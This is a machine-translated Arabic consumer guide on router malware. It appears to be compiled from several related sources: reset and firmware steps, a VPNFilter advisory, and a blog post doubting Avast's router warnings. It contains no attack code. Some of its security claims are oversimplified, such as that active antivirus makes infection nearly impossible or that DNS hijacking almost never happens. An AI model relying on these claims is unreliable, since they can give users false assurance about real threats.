• فيروس يبطئ سرعة الإنترنت بطرق مختلفة. على سبيل المثال ، تؤدي هذه البرامج الضارة إلى تعطيل إعدادات البرامج الثابتة أو بدء تنزيل بعض محتويات الفيروسات الإعلانية على الكمبيوتر ؛
• فيروس يحل محل عناوين مواقع الويب. يبدو كالتالي: يزور المستخدم أي موقع آمن معروف ، ويقوم الفيروس بتغيير DNS بحيث يصل المستخدم إلى موقع إعلاني أو يرى لافتات إعلانية حيث لم يضعها أصحاب الموقع. مثل هذا الفيروس خطير أيضًا لأنه يمكن أن ينقلك إلى موقع يحتوي على فيروسات أخرى.

على أي حال ، إذا لاحظت تشغيل جهاز التوجيه بشكل غير صحيح ، فيجب عليك التحقق من وجود فيروسات ، خاصة أنه من السهل جدًا التخلص منها.

كيف ينتقل الفيروس إلى جهاز التوجيه

يوفر جهاز التوجيه الإنترنت لجميع الأجهزة المتصلة به. هذا يعني أن جميع الأجهزة والموجه نفسه على نفس الشبكة المنزلية. هذا ما يستخدمه الفيروس: يدخل إلى الكمبيوتر من موقع ما أو ملف تم تنزيله ، ثم ينتقل عبر الشبكة إلى جهاز التوجيه ، حيث يبدأ في تشغيل الحيل القذرة. تعتمد العملية على نموذج الفيروس ، على سبيل المثال ، بعض البرامج الضارة لا تكتشف نفسها على وجه التحديد على الكمبيوتر ، ولكنها تبدأ في العمل فقط عند دخولها إلى جهاز التوجيه ، بينما يتمكن الآخرون من إلحاق الضرر بكل من نظام التشغيل والبرامج الثابتة لجهاز التوجيه في نفس الوقت زمن.

فحص جهاز التوجيه

قبل تنظيف جهاز التوجيه من الفيروسات ، عليك التحقق مما إذا كانت موجودة عليه. لمعرفة النتيجة ، تحتاج إلى استخدام الإنترنت مباشرة من خلال جهاز كمبيوتر. أي ، قم بإزالة كبل أو مودم WLAN من جهاز التوجيه وأدخله في منفذ الكمبيوتر ، ثم اتبع الخطوات التالية:

إذا كنت تواجه مشكلات في السرعة ، فاتبع هذه الخطوات الثلاث.

1. تحقق من سرعة الإنترنت لديك. يجب القيام بذلك من أجل معرفة ما إذا كانت السرعة هي نفسها في المستقبل عند استخدام الشبكة مباشرة ومن خلال جهاز توجيه. على سبيل المثال ، يمكنك تنزيل ملف أو استخدام خدمة Speedtest الخاصة عبر الإنترنت.

   نقوم بفحص سرعة الإنترنت من خلال موقع Speedtest

2. لتحديد جودة الإشارة بشكل أكثر دقة ، تحتاج إلى معرفة معدل ping. Ping هو الوقت الذي يستغرقه إرسال إشارة من جهازك والوصول إلى الخادم والعودة مرة أخرى. بطبيعة الحال ، كلما كان حجمه أكبر ، كان أسوأ بالنسبة لك. افتح موجه الأوامر ، واكتب الأمر ping ip وقم بتشغيله. عنوان IP الخاص باتصالك ، الافتراضي هو عادة 192.168.0.1 ، ولكن قد يختلف. تذكر النتيجة. قيمة ping العادية التي تصل إلى 40 مللي ثانية هي مؤشر ممتاز ، 40-110 مللي ثانية هي قيمة متوسطة عادية ، أكثر من 110 مللي ثانية - يجب أن تفكر في إعادة تكوين الشبكة أو تحسين الإشارة أو تغيير المزود.

   قم بتنفيذ الأمر ping ip

3. بعد قائمة الحزم المرسلة ، سترى الإحصائيات. أنت مهتم بسطر "الحزم" ، فهو يحسب عدد الحزم التي تم إرسالها أو فقدها أو إكمالها. إذا تجاوز عدد الحزم المفقودة 5٪ ، فأنت بحاجة إلى معرفة المشكلة. إذا لم يصل عدد كبير من الحزم إلى الخادم أو عاد ، فسيؤثر ذلك بشكل كبير على سرعة الإنترنت.

   انظر إلى النسبة المئوية للحزم المفقودة

بعد وصف جميع الخطوات المذكورة أعلاه ، احصل على معلومات مفصلة حول ping وعدد الحزم المفقودة وسرعة الإنترنت ، وأعد توصيل كبل WLAN أو المودم بالموجه وتحقق من جميع المؤشرات نفسها عند الاتصال عبر Wi-Fi. إذا كانت المعلمات على نفس المستوى تقريبًا ، فإن المشكلة لا تكمن في جهاز التوجيه ، وربما يكون السبب من جانب المشغل. بخلاف ذلك ، إذا حدثت مشكلات مع الإنترنت فقط عند استخدامه من خلال جهاز توجيه ، فستحتاج إلى إجراء إعادة تعيين إعدادات المصنع وتنظيف الفيروسات.

إزالة الفيروسات

لإزالة الفيروس ، تحتاج إلى إعادة تعيين الإعدادات إلى القيم الافتراضية. إذا تمكن الفيروس من إتلاف البرامج الثابتة ، فسيتعين عليك تثبيته مرة أخرى بنفسك.

إعادة تعيين المعلمات

1. ابحث عن زر إعادة الضبط في الجزء الخلفي من جهاز التوجيه. عادة ما يكون أصغر من كل الآخرين. يجب أن يتم الضغط عليه لمدة 10-15 ثانية. عندما يتم إيقاف تشغيل جهاز التوجيه ويبدأ في إعادة التشغيل ، يمكنك تحريره. ستُعلمك إعادة تشغيل جهاز التوجيه بإعادة ضبط الإعدادات. يرجى ملاحظة أن كلمة المرور التي تم تعيينها ستفقد أيضًا.

   اضغط على زر إعادة الضبط

2. لإعادة تكوين جهاز التوجيه ، تحتاج إلى توصيله بالكمبيوتر عبر الكابل ، ثم فتح المتصفح والانتقال إلى http://192.168.0.1. ربما سيكون العنوان مختلفًا ، يمكنك العثور عليه على ملصق موجود على جهاز التوجيه نفسه ، أو في الوثائق المرفقة مع جهاز التوجيه. سيُطلب منك تسجيل الدخول وكلمة المرور ، بشكل افتراضي ، يكون تسجيل الدخول هو المسؤول ، وكلمة المرور هي admin أو 12345. لمزيد من التفاصيل ، راجع الإرشادات الخاصة بالموجه.
3. انتقل إلى الإعداد السريع. حدد الخيارات التي تناسبك. إذا كنت ترغب في ذلك ، فقم بتعيين كلمة مرور وتغيير اسم الشبكة. بعد إجراء عملية الإعداد ، احفظ التغييرات وأعد تشغيل جهاز التوجيه.

   انتقل إلى قسم "الإعداد السريع" واضبط الإعدادات الملائمة

بعد الانتهاء من جميع الخطوات المذكورة أعلاه ، تحقق مما إذا كنت قد تخلصت من الخطأ. إذا لم يكن كذلك ، فسيتعين عليك إعادة تحميل ملفات جهاز التوجيه يدويًا.

امض جهاز التوجيه

البرنامج الثابت للموجه ممكن فقط إذا كان الجهاز متصلاً بالكمبيوتر بواسطة كابل. لا يمكنك تحديث البرنامج الثابت عبر Wi-Fi.

1. يوجد ملصق على الجزء الخلفي من جهاز التوجيه. ابحث عن طراز جهاز التوجيه الخاص بك عليه. يحتوي أيضًا على معلومات حول إصدار البرنامج الثابت المثبت في البداية. إذا كان الإصدار 7 ، فمن الأفضل تثبيت التحديث للإصدار 7 لتجنب تعارض البرامج الثابتة الجديدة جدًا مع الأجهزة القديمة لجهاز التوجيه.

   تعرف على إصدار البرنامج الثابت وطراز جهاز التوجيه

2. انتقل إلى موقع الشركة المصنعة على الويب واستخدم مربع البحث للعثور على الإصدار الصحيح لطرازك. قم بتنزيله على جهاز الكمبيوتر الخاص بك.

   ابحث عن إصدار البرنامج الثابت المطلوب وقم بتنزيله

3. سيتم أرشفة الملف الذي تم تنزيله. استخرج محتوياته إلى أي مجلد مناسب.

   حدد المسار إلى البرنامج الثابت

4. ابدأ إجراء التحديث وانتظر حتى ينتهي. أعد تشغيل جهاز التوجيه الخاص بك. يجب تحديث البرنامج الثابت ، ومن المرجح أن تختفي جميع المشكلات والفيروسات.

   نحن في انتظار انتهاء التثبيت

فيديو: كيفية وميض جهاز التوجيه

كيف تحمي جهاز التوجيه الخاص بك من الفيروسات في المستقبل

الطريقة الوحيدة لحماية جهاز التوجيه من الفيروسات هي منعها من اختراق الكمبيوتر. جهاز الكمبيوتر الخاص بك محمي بواسطة برامج مكافحة الفيروسات. قم بتثبيت أي برنامج مكافحة فيروسات حديث وعدم تعطيله تحت أي ظرف من الظروف. يكاد يكون من المستحيل التقاط البرامج الضارة باستخدام برنامج مكافحة فيروسات نشط. ليس من الضروري حتى استخدام برامج الأمان المدفوعة ، في عصرنا هناك ما يكفي من نظائرها المجانية عالية الجودة.

ماذا تفعل إذا لم يساعد شيء

إذا لم يؤد تنفيذ جميع الإرشادات المذكورة أعلاه إلى النتيجة المرجوة ، فلا يزال هناك خياران: تحدث المشكلة بسبب تعطل الجزء المادي من جهاز التوجيه أو حدوث أخطاء من جانب المزود. أولاً ، يجب عليك الاتصال بالشركة التي تزودك بالإنترنت وإخبارهم بمشكلتك والطرق التي لم تساعد في حلها. ثانيًا ، يجب نقل الراوتر إلى خدمة خاصة لفحصه من قبل المتخصصين.

عدوى فيروس جهاز التوجيه نادرة ولكنها خطيرة. هناك طريقتان للتخلص من الفيروس: إعادة ضبط الإعدادات وتحديث البرنامج الثابت. تحتاج أيضًا إلى التأكد من عدم بقاء البرامج الضارة على الكمبيوتر.

يعد VPNFilter تهديدًا يؤثر على مجموعة متنوعة من أجهزة التوجيه ونماذج التخزين المتصلة بالشبكة (NAS). يمكن لـ VPNFilter جمع معلومات حساسة والتفاعل مع حركة مرور الشبكة ، بالإضافة إلى تعطيل أداء جهاز التوجيه. ينجو هذا البرنامج الضار من إعادة تشغيل جهاز التوجيه.

تقدم Symantec أداة مجانية عبر الإنترنت لإجراء فحص VPNFilter سريع على جهاز التوجيه الخاص بك.

معلومات مهمة

تتحقق الأداة عبر الإنترنت مما إذا كان جهازك قد تعرض للاختراق بواسطة مكون VPNFilter المعروف باسم المكون الإضافي ssler. إذا لم يكن جهاز التوجيه الخاص بك مصابًا بالمكوّن الإضافي ssler ، فلا يزال من الممكن اختراقه من خلال التهديدات الأخرى أو مكونات VPNFilter.

إذا كنت قلقًا أو تشك في أن جهاز التوجيه الخاص بك مصاب ببرنامج VPNFilter ، فيجب عليك اتباع التوصيات أدناه.

ماذا تفعل في حالة الإصابة

إذا كنت قلقًا من إصابة جهاز التوجيه الخاص بك ببرنامج VPNFilter ، فننصحك باتباع الخطوات التالية:

1. أعد ضبط جهاز التوجيه الخاص بك لاستعادة إعدادات المصنع. احفظ تكوين جهاز التوجيه الخاص بك أولاً ، حيث ستحتاج إلى إعادة تكوينه بعد ذلك.
2. قم بإيقاف تشغيل جهاز التوجيه وإعادة تشغيله. يرجى ملاحظة أن إعادة تشغيل جهاز التوجيه دون إجراء إعادة ضبط المصنع أولاً لا يؤدي إلى إزالة VPNFilter.
3. قم بتغيير كلمة مرور المسؤول لجهاز التوجيه الخاص بك إلى كلمة مرور أكثر أمانًا. إذا أمكن ، افصل جهاز التوجيه الخاص بك عن الإنترنت أثناء اتباع هذه الخطوة.
4. قم بتثبيت آخر التحديثات والبرامج الثابتة لجهاز التوجيه الخاص بك.

حتى وقت قريب ، لم أكن أعرف حتى أن جهاز التوجيه Avast يخيف مستخدميه بتحذيرات "مخيفة" فيما يتعلق بأجهزة التوجيه الخاصة بهم. كما اتضح فيما بعد ، يقوم برنامج Avast Antivirus بفحص أجهزة توجيه Wi-Fi. يعطي نتائج مفادها أن جهاز التوجيه لم يتم تكوينه بشكل صحيح ، أو أن الجهاز عرضة للهجمات ، أو بشكل عام أن جهاز التوجيه مصاب ومصاب ، وأن المهاجمين قد اعترضوا بالفعل عناوين DNS ويقومون بإعادة توجيهك بنجاح إلى مواقع ضارة ، وسرقة معلومات بطاقة الائتمان ، وبشكل عام كل شيء سيء للغاية. كل هذه التحذيرات ، بالطبع ، محنك باللون الأحمر الخطير والتعليمات المربكة التي لن يفهمها حتى المتخصص الجيد بدون البيرة. أنا لا أتحدث عن المستخدمين العاديين. هذه هي الطريقة التي تبدو بها المشاكل الموجودة على جهاز التوجيه D-Link DIR-615:

الجهاز عرضة للهجمات:

من الحلول بالطبع تحديث البرامج الثابتة لجهاز التوجيه. للأسباب الأخرى ، يمكن لـ Avast أيضًا عرض رسالة مفادها أن جهاز التوجيه الخاص بك محمي بكلمة مرور ضعيفة ، أو أن جهاز التوجيه غير محمي من القرصنة.

في بعض الحالات ، يمكنك رؤية رسالة تفيد بأن جهاز التوجيه الخاص بك مصاب، ويتم إعادة توجيه الاتصالات إلى خادم ضار. يشرح Avast Antivirus ذلك بالقول إن جهاز التوجيه الخاص بك قد تم اختراقه وتم تغيير عناوين DNS الخاصة به إلى عناوين ضارة. كما يوفر إرشادات لحل هذه المشكلة لأجهزة التوجيه المختلفة: ASUS و TP-Link و ZyXEL و D-Link و Huawei و Linksys / Cisco و NETGEAR و Sagem / Sagemco.

باختصار ، تهدف كل هذه التوصيات إلى التحقق من عناوين DNS والخدمات المرتبطة بـ DNS. يمكن للمهاجمين من خلالها تغيير DNS على جهاز التوجيه الخاص بك وإعادة توجيهك إلى مواقعهم الضارة. توجد إرشادات مفصلة حول كيفية التحقق من كل شيء على أجهزة التوجيه من جهات تصنيع مختلفة.

كيف ترد على تحذير من Avast بشأن ثغرة في جهاز التوجيه؟

أعتقد أن الجميع مهتم بهذا السؤال. خاصة إذا كنت قد وصلت إلى هذه الصفحة. إذا كنت تتساءل كيف سأرد على مثل هذه التحذيرات من برنامج مكافحة الفيروسات ، فإن الإجابة بسيطة - مستحيل. أنا متأكد من أن Avast كان سيجد ثغرات في جهاز التوجيه الخاص بي يمكن من خلالها اختراق حسابي. لدي فقط Dr.Web. لا يقوم بهذه الفحوصات.

ربما أكون مخطئًا ، لكن لا يوجد برنامج مكافحة فيروسات بخلاف Avast يتحقق من أجهزة توجيه Wi-Fi التي تتصل بها بحثًا عن أنواع مختلفة من نقاط الضعف. وظهرت هذه الميزة ، المسماة Home Network Security ، في عام 2015. في إصدار Avast 2015.

يفحص Avast جهاز التوجيه بحثًا عن مشكلات أمان الجهاز. ومع ذلك ، لا أفهم تمامًا كيف يفعل ذلك. على سبيل المثال ، كيف يتحقق من نفس كلمة المرور لإدخال إعدادات جهاز التوجيه. يتبع المستخدم ، أو طريقة الاختيار؟ إذا التقطتها ، فإن كلمة المرور سيئة 🙂 حسنًا ، حسنًا ، أنا لست مبرمجًا.

أنا شخصياً أعتقد أن كل هذه التحذيرات ليست أكثر من مجرد توصيات بسيطة لتعزيز حماية جهاز التوجيه الخاص بك. هذا لا يعني أن شخصًا ما قد اخترقك بالفعل وسرق بياناتك. ما تقدمه أفاست:

• قم بتعيين كلمة مرور جيدة وقم بتحديث البرنامج الثابت لجهاز التوجيه. يقولون بخلاف ذلك يمكن اختراقك. حسنًا ، هذا مفهوم. لا يجب الإشارة إليه على أنه نوع من الضعف المخيف. على الرغم من أنني مرة أخرى ، لا أفهم كيف يحدد برنامج مكافحة الفيروسات أن إصدار برنامج جهاز التوجيه قديم. يبدو لي أن هذا مستحيل.
• جهاز التوجيه غير محمي من الاتصالات من الإنترنت. على الأرجح ، يظهر مثل هذا التحذير بعد فحص المنافذ المفتوحة. ولكن افتراضيًا ، على جميع أجهزة التوجيه ، يتم تعطيل وظيفة "الوصول من WAN". أشك بشدة في أن شخصًا ما سوف يخترق جهاز التوجيه الخاص بك عبر الإنترنت.
• حسنًا ، أسوأ شيء هو استبدال عناوين DNS. إذا تم الكشف عن أي مشاكل مع DNS ، فإن Avast يكتب بالفعل مباشرة أن "جهاز التوجيه الخاص بك مصاب!". لكن في 99٪ من الحالات لا يكون الأمر كذلك. مرة أخرى ، يتلقى الموجه دائمًا DNS تلقائيًا من المزود. وجميع الوظائف والخدمات التي يمكن للمهاجمين من خلالها تغيير DNS بطريقة أو بأخرى معطلة بشكل افتراضي. يبدو لي أنه في كثير من الأحيان "يفهم" برنامج مكافحة الفيروسات بعض إعدادات المستخدم بشكل غير صحيح.

شيء من هذا القبيل. بالطبع ، قد لا تتفق معي. يبدو لي أنه من الأسهل بكثير الوصول إلى جهاز كمبيوتر وإصابته مباشرة بدلاً من القيام بذلك باستخدام جهاز توجيه. إذا كنا نتحدث عن هجوم عبر الإنترنت. يسعدني أن أرى رأيك في هذا الأمر في التعليقات.

كيف تحمي جهاز التوجيه وتزيل التحذير من Avast؟

دعنا نحاول التعامل مع كل عنصر يقوم Avast على الأرجح بفحصه وإصدار تحذيراته.

• جهاز التوجيه محمي بكلمة مرور ضعيفة. لا يوجد تشفير.في الحالة الأولى ، يحتوي برنامج مكافحة الفيروسات على كلمة مرور تحتاج إلى إدخالها عند إدخال إعدادات جهاز التوجيه. عادةً ما تكون كلمة المرور الافتراضية هي admin. أو غير مثبت على الإطلاق. واتضح أن كل شخص متصل بشبكتك يمكنه الدخول إلى إعدادات جهاز التوجيه. لذلك ، يجب تغيير كلمة المرور هذه. كيف أفعل هذا كتبت في المقال:. بالنسبة لكلمة مرور شبكة Wi-Fi ، يجب أن تكون قوية أيضًا ، ويجب استخدام نوع تشفير WPA2. أكتب دائمًا عن هذا في الإرشادات الخاصة بإعداد أجهزة التوجيه.
• جهاز التوجيه ضعيف بسبب البرامج القديمة.هذا ليس صحيحا تماما ولكن ، إذا كان هناك برنامج ثابت جديد لطراز جهاز التوجيه الخاص بك ، فمن المستحسن تحديثه. ليس فقط لتحسين الأمان ، ولكن أيضًا من أجل تشغيل أكثر استقرارًا للجهاز وميزات جديدة. لدينا تعليمات على موقع الويب لتحديث البرامج الخاصة بأجهزة التوجيه من جهات تصنيع مختلفة. يمكنك أن تجد من خلال البحث ، أو تسأل في التعليقات. هنا ل.
• تم تغيير إعدادات DNS. تم اختراق جهاز التوجيه.لأكون صادقًا ، لم أر مثل هذه الحالات من قبل. كما كتبت أعلاه ، يتم تعطيل جميع الخدمات التي يمكن أن يحدث هذا من خلالها بشكل افتراضي. في أغلب الأحيان ، يتلقى جهاز التوجيه DNS من المزود تلقائيًا. النصيحة الوحيدة التي يمكنني تقديمها هي عدم إدخال عناوين DNS يدويًا لست متأكدًا منها. وإذا قمت بتحديد العناوين يدويًا ، فمن الأفضل استخدام DNS الخاص بـ Google فقط ، والذي:. يُنصح بذلك أيضًا في توصيات Avast ، والتي يمكن عرضها على الموقع الرسمي :. توجد إرشادات مفصلة لحل مشكلات DNS لجميع أجهزة التوجيه تقريبًا.

هذا كل شئ. آمل أن أكون قادرًا على توضيح هذه التحذيرات على الأقل في برنامج مكافحة الفيروسات Avast. اطرح أسئلة في التعليقات ، ولا تنس مشاركة معلومات مفيدة حول هذا الموضوع. حظا طيبا وفقك الله!